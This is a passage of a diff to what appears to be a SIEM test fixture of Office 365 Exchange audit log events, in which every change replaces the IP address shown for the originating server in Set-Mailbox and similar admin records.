bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3964,7 +3964,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -4038,7 +4038,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -4050,7 +4050,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -4124,7 +4124,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -4136,7 +4136,7 @@
 "Operation": "Set-RecipientEnforcementProvisioningPolicy",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -4166,7 +4166,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -4178,7 +4178,7 @@
 "Operation": "Set-AdminAuditLogConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -4208,7 +4208,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -4220,7 +4220,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -4294,7 +4294,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -4306,7 +4306,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -4380,7 +4380,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -4392,7 +4392,7 @@
 "Operation": "Set-AdminAuditLogConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -4422,7 +4422,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -4434,7 +4434,7 @@
 "Operation": "Set-OwaMailboxPolicy",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "InstantMessagingType",
@@ -4456,7 +4456,7 @@
 },
 {
 "event": {
